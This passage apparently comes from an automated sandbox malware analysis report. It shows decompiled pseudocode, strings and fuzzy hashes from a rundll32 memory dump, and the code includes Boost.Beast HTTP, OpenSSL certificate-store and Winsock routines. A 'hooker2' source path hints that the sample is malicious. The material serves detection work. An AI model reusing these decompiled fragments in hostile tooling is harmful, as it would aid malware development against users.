                                        				goto 0xf300bcf0;
                                        				if (0 != 3) goto 0xf300bccc;
                                        				goto 0xf300bcf0;
                                        				if (0 != 4) goto 0xf300bcdd;
                                        				goto 0xf300bcf0;
                                        				if (0 != 5) goto 0xf300bcee;
                                        				goto 0xf300bcf0;
                                        				_v16 = 0;
                                        				if (1 == 0) goto 0xf300bdff;
                                        				_t121 =  *__rcx;
                                        				asm("movups xmm1, [ecx]");
                                        				asm("psrldq xmm1, 0x8");
                                        				asm("dec ax");
                                        				if ( *((intOrPtr*)(_t130 + 8)) == 0) goto 0xf300bd3d;
                                        				if (1 == 0) goto 0xf300bd31;
                                        				if (1 != 1) goto 0xf300bd2d;
                                        				_a16 = _t115;
                                        				if ( *((char*)(_t115 + 0x10)) == 0) goto 0xf300bd2d;
                                        				 *((char*)(_t115 + 0x10)) = 0;
                                        				 *((char*)(_t115 + 0x18)) = 0;
                                        				 *_t115 = _t121;
                                        				 *((char*)(_t115 + 0x18)) = 2;
                                        				goto 0xf300bdff;
                                        				if (1 == 0) goto 0xf300bd58;
                                        				if (1 != 1) goto 0xf300bd54;
                                        				_a16 = _t115;
                                        				if ( *((char*)(_t115 + 0x10)) == 0) goto 0xf300bd54;
                                        				 *((char*)(_t115 + 0x10)) = 0;
                                        				 *((char*)(_t115 + 0x18)) = 0;
                                        				 *((char*)(_t115 + 0x18)) = 3;
                                        				goto 0xf300bdff;
                                        				if (1 != 2) goto 0xf300bda2;
                                        				_t122 = _t121 + 8;
                                        				 *_t122 =  *_t122 + 0x10;
                                        				if ( *_t122 !=  *__rcx + 0x10) goto 0xf300bdff;
                                        				if (1 == 0) goto 0xf300bd9c;
                                        				if (( *(_t122 + 0x18) & 0x000000ff) != 1) goto 0xf300bd98;
                                        				_a16 = _t122;
                                        				if ( *((char*)(_t122 + 0x10)) == 0) goto 0xf300bd98;
                                        				 *((char*)(_t122 + 0x10)) = 0;
                                        				 *(_t122 + 0x18) = 0;
                                        				 *(_t122 + 0x18) = 3;
                                        				goto 0xf300bdff;
                                        				_v32 = 0xf319d200;
                                        				_v24 = 0xf319d200;
                                        				_v16 = 0xf319d200;
                                        				_v48 = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t115,  &_v48,  &_v24, _t130, __rcx);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t115,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::asio::const_buffer>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,2> &)", _t130);
                                        			}

















                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300BDBA
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas, xrefs: 0000021EF300BDED
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<clas
                                        • API String ID: 592178966-3009069526
                                        • Opcode ID: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction ID: 869d02d1ba38b5dda3060f9c7bac2a628ff777e88543fe67b658c9693418b773
                                        • Opcode Fuzzy Hash: 007dedca1d4c0c60add468d157471b5fdec836d95774991d8197f5e944365b8d
                                        • Instruction Fuzzy Hash: 3951D472009B8481EF608F29D8483AA67A3E7B1B48F554123DEEA07B99DF3DC593C340
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 75%
                                        			E0000021E21EF300BEF0(intOrPtr* __rcx) {
                                        				signed int _t10;
                                        				void* _t16;
                                        				intOrPtr _t18;
                                        
                                        				_t10 =  *(__rcx + 0x10) & 0x000000ff;
                                        				if (_t10 != 1) goto 0xf300bf3c;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				_t18 =  *__rcx;
                                        				_t16 =  *((intOrPtr*)(_t18 + 0x30)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) != _t16) goto 0xf300bfcd;
                                        				asm("movups xmm1, [edx+0x20]");
                                        				asm("psrldq xmm1, 0x8");
                                        				asm("dec ax");
                                        				if (_t16 == 0) goto 0xf300bf52;
                                        				if ( *(__rcx + 0x10) == 0) goto 0xf300bf33;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *((long long*)(__rcx + 8)) = _t18 + 0x20;
                                        				 *(__rcx + 0x10) = 2;
                                        				return _t10;
                                        			}







                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF30120E7
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con, xrefs: 0000021EF301211A
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(con
                                        • API String ID: 1552479455-1729322650
                                        • Opcode ID: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction ID: 34df1d45a07eb9c91c494a355a0ef0912d828106c8a9360120245b3bb1a7e6f2
                                        • Opcode Fuzzy Hash: e65c547b6365f5cc188a16297207a4218a11443e47f1737acb69d2afbe79d735
                                        • Instruction Fuzzy Hash: 8A51B172105B8485EF21871CC8483DA3BE5F365B0CFB58616DE9D06AA2EB6EC587C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 626452242-3997076816
                                        • Opcode ID: 104bea0762e8abe3ae5894b6eb9620281372dcb7c218e1b3971c5c4c23c0aed1
                                        • Instruction ID: 2dac5bac180d417906d18ff53f5302e47c95966d27d111d143f0d2a82ee7e820
                                        • Opcode Fuzzy Hash: 104bea0762e8abe3ae5894b6eb9620281372dcb7c218e1b3971c5c4c23c0aed1
                                        • Instruction Fuzzy Hash: F1416C7130474086FB64DF25EC087DBB3A5F768B94F41422AEE4992EA9DB3CC546CB04
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 665277682-3997076816
                                        • Opcode ID: 6be8e61a04173de78ca0fe913ce11004b49e7506ff8f605a30e0c00f8b1dd540
                                        • Instruction ID: a7300a585d1b9e54877e63f104c6a199eb5b62a0a61009e7ddd40703db2e817a
                                        • Opcode Fuzzy Hash: 6be8e61a04173de78ca0fe913ce11004b49e7506ff8f605a30e0c00f8b1dd540
                                        • Instruction Fuzzy Hash: 04218D7531020186FF609B65FD087EB63B1F7A9B84F824026EE0987EA5EB3DC556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 49%
                                        			E0000021E21EF31205A8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, long __r14, void* _a8, long long _a16, long long _a24) {
                                        				long long _v0;
                                        				long long _v40;
                                        				void* __rdi;
                                        				void* _t13;
                                        				void* _t16;
                                        				void* _t19;
                                        				void* _t21;
                                        				intOrPtr* _t27;
                                        				void* _t29;
                                        				long long _t40;
                                        				void* _t42;
                                        				void* _t44;
                                        				void* _t49;
                                        				void* _t55;
                                        				long long _t60;
                                        
                                        				_t60 = __r8;
                                        				_a8 = __rbx;
                                        				_a16 = __rbp;
                                        				_a24 = __rsi;
                                        				_t19 = r8d;
                                        				_t13 = E0000021E21EF312C4B0(3, _t21, __rax);
                                        				if (_t13 == 1) goto 0xf312060c;
                                        				if (_t13 != 0) goto 0xf31205e7;
                                        				if (E0000021E21EF312C360() == 1) goto 0xf312061b;
                                        				r8d = _t19;
                                        				_t29 = _a8;
                                        				_t49 = _a24;
                                        				_t44 = _t42;
                                        				goto 0xf311fb98;
                                        				r8d = _t19;
                                        				E0000021E21EF3120430(_t29, _t49, _t44, _t44, _t49, __r14);
                                        				asm("int3");
                                        				r8d = _t19;
                                        				_t40 = _t44;
                                        				_t16 = E0000021E21EF3120430(_t29, _t49, _t40, _t44, _t49, __r14);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				_t27 = _t55 - 0x20 + 0x20;
                                        				 *((long long*)(_t27 + 0x10)) = _t40;
                                        				 *((long long*)(_t27 + 0x18)) = _t60;
                                        				 *((long long*)(_t27 + 0x20)) = _v0;
                                        				_push(_t29);
                                        				_push(_t49);
                                        				_push(_t44);
                                        				E0000021E21EF301E120(_t16);
                                        				r9d = 0;
                                        				_v40 = _t27 + 0x18;
                                        				return E0000021E21EF3116A00( *_t27, _t49, _t40, _v0);
                                        			}



















                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        • Opcode ID: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction ID: 01da1a1525dcb044fd32d164eccbe0b5a3d74d38a50573a6dfdbbda4defe13ac
                                        • Opcode Fuzzy Hash: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction Fuzzy Hash: D811E27171069081EA249B03AD495DFA7A4FBA4FC0F558526EF4807F96CA3CC852C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FF00B0(long long __rax, long long __rbx, void* __rcx) {
                                        				long long _v8;
                                        				long long _v16;
                                        				long _v24;
                                        				long _t14;
                                        				void* _t15;
                                        				long long _t23;
                                        				intOrPtr _t27;
                                        				void* _t29;
                                        
                                        				_t23 = __rax;
                                        				_t27 =  *((intOrPtr*)(__rcx + 0x10));
                                        				_t2 = _t27 + 0x34;
                                        				 *_t2 = 1;
                                        				if ( *_t2 != 0) goto 0xf2ff0105;
                                        				_t4 = _t27 + 0x38;
                                        				 *_t4 = 1;
                                        				if ( *_t4 != 0) goto 0xf2ff0105;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2ff0105;
                                        				_v8 = __rbx;
                                        				_t14 = GetLastError();
                                        				_v24 = _t14;
                                        				_t15 = E0000021E21EF310D880( *((intOrPtr*)(_t27 + 0x28)), _t29);
                                        				_v16 = _t23;
                                        				if (_t14 != 0) goto 0xf2ff010a;
                                        				return _t15;
                                        			}












                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction ID: adaca079b9dfcc4c7c1581e574ef29ab596245f06d682767f55082300915aa37
                                        • Opcode Fuzzy Hash: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction Fuzzy Hash: 2111D072610B0285FF518B18EC8839623B0FBA4764F564325DE9847BA8EF3CC053C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction ID: e46d551d350e55877b307e5ed252d227de36d8393dd86290cc333cbfbf28b21e
                                        • Opcode Fuzzy Hash: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction Fuzzy Hash: 1121A133514B8182EE219B14FC883DBA3A1F7E5760F114325AEAA03B9ADF7CC156C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction ID: 4d64911849f6e76000fae94f815709192b09309289c2c6df25c0d6bebc9ca848
                                        • Opcode Fuzzy Hash: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction Fuzzy Hash: 65219032514B8182EE219B14F8883DBA2A1F7E5760F014325AEAA03A9ADF7CC156C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 64%
                                        			E0000021E21EF300F000(intOrPtr* __rcx) {
                                        				long long _v16;
                                        				char _v24;
                                        				char _v32;
                                        				char _v40;
                                        				char _v48;
                                        				long long _v56;
                                        				signed int _t25;
                                        				void* _t43;
                                        				void* _t49;
                                        				void* _t50;
                                        
                                        				_v56 = 0xfffffffe;
                                        				_t25 =  *(__rcx + 0x10) & 0x000000ff;
                                        				if (_t25 != 2) goto 0xf300f049;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
                                        				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x18) goto 0xf300f0cc;
                                        				if ( *(__rcx + 0x10) == 0) goto 0xf300f035;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *((long long*)(__rcx + 8)) = 0xf3204a34;
                                        				 *(__rcx + 0x10) = 3;
                                        				goto 0xf300f0cc;
                                        				if (_t25 != 3) goto 0xf300f06f;
                                        				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 2;
                                        				if ( *((intOrPtr*)(__rcx + 8)) != 0xf3204a36) goto 0xf300f0cc;
                                        				if ( *(__rcx + 0x10) == 0) goto 0xf300f069;
                                        				 *(__rcx + 0x10) = 0;
                                        				 *(__rcx + 0x10) = 4;
                                        				goto 0xf300f0cc;
                                        				_v32 = 0xf319d200;
                                        				_v24 = 0xf319d200;
                                        				_v16 = 0xf319d200;
                                        				_v48 = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t43,  &_v48,  &_v24, _t49, _t50);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xd9;
                                        				return E0000021E21EF3010190(0xf319d240, _t43,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &)", _t49);
                                        			}














                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300F087
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &), xrefs: 0000021EF300F0BA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &)
                                        • API String ID: 1552479455-3017229327
                                        • Opcode ID: ad28bee9222e2d29d783d2893dfcbf6626c0514ac3cbc7f36f2c347f93da2363
                                        • Instruction ID: 643144fefc561915890e8c6b084a784d0eccaaddf645b454073b49b4073d2fc0
                                        • Opcode Fuzzy Hash: ad28bee9222e2d29d783d2893dfcbf6626c0514ac3cbc7f36f2c347f93da2363
                                        • Instruction Fuzzy Hash: AC219D72109B8085EF608718E8483CA37E1E3A5718FA58216DE9D47AE1EB7DC597C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &, xrefs: 0000021EF3011C64
                                        • invalid iterator, xrefs: 0000021EF3011C34
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &$invalid iterator
                                        • API String ID: 1552479455-487838338
                                        • Opcode ID: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction ID: 87503ec8148e363744febb057b6d076b7359c42c33abbc6256b2b2fc793569ed
                                        • Opcode Fuzzy Hash: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction Fuzzy Hash: 98016D32325B4495EB40DB14E98839E23A6F794390F524221EEBD47BA6EF7DC996C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 24%
                                        			E0000021E21EF3030650(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r9, long long _a8, long long _a24, void* _a56) {
                                        				intOrPtr _t25;
                                        				long long _t30;
                                        				void* _t33;
                                        				char* _t35;
                                        
                                        				_t33 = __rcx;
                                        				_a8 = __rbx;
                                        				E0000021E21EF310C220();
                                        				if (__rdx != 0) goto 0xf3030680;
                                        				_t25 =  *((intOrPtr*)(__rcx + 0x28));
                                        				_t30 =  !=  ? _t25 : "MY";
                                        				_t35 = "Opening certificate store %s\n";
                                        				E0000021E21EF302D790(_t25, _t35, _t30, __r9);
                                        				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                        				r8d = 0;
                                        				_a24 = _t30;
                                        				__imp__CertOpenStore();
                                        				if (_t25 != 0) goto 0xf30306ea;
                                        				if ( *0xf3209020 != 0) goto 0xf30306c3;
                                        				 *0xf3209020 = E0000021E21EF3021CE0(_t25);
                                        				_a24 = 0x56d;
                                        				_t7 = _t35 + 1; // 0x6e
                                        				r8d = _t7;
                                        				E0000021E21EF30222D0(_t12, 0x6d,  *0xf3209020, _t25, _t25, _t33, _t35, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				return E0000021E21EF302DA10( *0xf3209020, _t25, _t35);
                                        			}








                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertOpenStore
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Opening certificate store %s
                                        • API String ID: 1485946479-1252851234
                                        • Opcode ID: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction ID: 95edbb04597189c23e9866dbed50b389366e7d9ca8ba49f1b51aa32099fb9d7e
                                        • Opcode Fuzzy Hash: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction Fuzzy Hash: 7D117C7530164086FF60DB15ED087CBB2A1BB68B84F4680269D0947F65EB2CC916CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E0000021E21EF31295C0(signed int __edx, long long __rbx, intOrPtr* __rdx, intOrPtr* __r8, long long __r9, long long _a8, long long _a32) {
                                        				intOrPtr* _t28;
                                        				signed long long _t33;
                                        
                                        				_a8 = __rbx;
                                        				_a32 = __r9;
                                        				E0000021E21EF312B41C();
                                        				_t33 =  *((intOrPtr*)( *__r8));
                                        				_t28 =  *((intOrPtr*)(0xf320ad20 + (_t33 >> 6) * 8));
                                        				if (( *(_t28 + (_t33 << 6) + 0x38) & 0x00000001) == 0) goto 0xf312962a;
                                        				E0000021E21EF312B710( *__rdx, __edx & 0x0000003f, _t28);
                                        				if (FlushFileBuffers(??) != 0) goto 0xf3129638;
                                        				E0000021E21EF3118964(_t28);
                                        				 *_t28 = GetLastError();
                                        				E0000021E21EF3118984(_t28);
                                        				 *_t28 = 9;
                                        				0xf312b500();
                                        				return 0xffffffff;
                                        			}






                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BuffersErrorFileFlushLast
                                        • String ID: nLength % 4 == 0
                                        • API String ID: 1917127615-1766050363
                                        • Opcode ID: efd6a67a954a7b5a3758ae28ac046c29ed0877c2caedd2c08a42114c46050eac
                                        • Instruction ID: e2ff3ef52f92fe8e979cfc4607af2de783c9f2f7fed8bad8227e8c28d3a9ee14
                                        • Opcode Fuzzy Hash: efd6a67a954a7b5a3758ae28ac046c29ed0877c2caedd2c08a42114c46050eac
                                        • Instruction Fuzzy Hash: C301B531700B4982EF549F65EC882DA63F1A7A9F84F458124DE594B796DE3CC455C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FEF7D0(long long __rax, long long __rbx, void* __rcx) {
                                        				long long _v8;
                                        				long long _v16;
                                        				long _v24;
                                        				long _t13;
                                        				void* _t14;
                                        				long long _t22;
                                        				void* _t27;
                                        
                                        				_t22 = __rax;
                                        				_t1 = __rcx + 0x34;
                                        				 *_t1 = 1;
                                        				if ( *_t1 != 0) goto 0xf2fef821;
                                        				_t3 = __rcx + 0x38;
                                        				 *_t3 = 1;
                                        				if ( *_t3 != 0) goto 0xf2fef821;
                                        				r9d = 0;
                                        				r8d = 0;
                                        				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2fef821;
                                        				_v8 = __rbx;
                                        				_t13 = GetLastError();
                                        				_v24 = _t13;
                                        				_t14 = E0000021E21EF310D880( *((intOrPtr*)(__rcx + 0x28)), _t27);
                                        				_v16 = _t22;
                                        				if (_t13 != 0) goto 0xf2fef826;
                                        				return _t14;
                                        			}











                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: fca6a54c8cb31b2c655eea5be78ba602287ab6f3eef0856d5f60807ed5bd4523
                                        • Instruction ID: f02f2d2f8bf0c76c651a2788ccae9450a8736438287baff331868d2c329ba95c
                                        • Opcode Fuzzy Hash: fca6a54c8cb31b2c655eea5be78ba602287ab6f3eef0856d5f60807ed5bd4523
                                        • Instruction Fuzzy Hash: C1F08173620E0286FF919B19AC8478623B0F7E4714F661124DE4986B55EF29C553C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: could not convert calendar time to UTC time
                                        • API String ID: 3608347590-2088861013
                                        • Opcode ID: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction ID: edd560eb669de72d7373e40b37f703d999a32ae48f61caefeb0da1c903f22cee
                                        • Opcode Fuzzy Hash: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction Fuzzy Hash: CB01213221AB4195EE609B10E8443DB73B5F7A4364F815325AEAD42FA9EF2CC55AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 25%
                                        			E0000021E21EF3013220() {
                                        				char _v32;
                                        				char _v40;
                                        				char _v120;
                                        				char _v128;
                                        				long long _v160;
                                        				long long _v192;
                                        				char _v200;
                                        				char _v208;
                                        				char _v216;
                                        				char _v224;
                                        				long long _v232;
                                        				signed int _t49;
                                        				long long _t62;
                                        				void* _t66;
                                        				char* _t70;
                                        				long long _t77;
                                        				void* _t80;
                                        				void* _t81;
                                        				void* _t82;
                                        				void* _t85;
                                        				void* _t86;
                                        
                                        				_t85 = _t82;
                                        				 *((long long*)(_t85 - 0x38)) = 0xfffffffe;
                                        				 *((long long*)(_t85 - 0x20)) = 0xf319d200;
                                        				 *((long long*)(_t85 - 0x18)) = 0xf319d200;
                                        				 *((long long*)(_t85 - 0x10)) = 0xf319d200;
                                        				 *((long long*)(_t85 - 0x30)) = "invalid iterator";
                                        				_v40 = 1;
                                        				E0000021E21EF310E0E4(_t66, _t85 - 0x30, _t85 - 0x18, _t80, _t81);
                                        				_v32 = 0xf319d240;
                                        				r9d = 0xc2;
                                        				E0000021E21EF3010190(0xf319d240, _t66,  &_v32, "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const", _t80);
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
                                        				asm("int3");
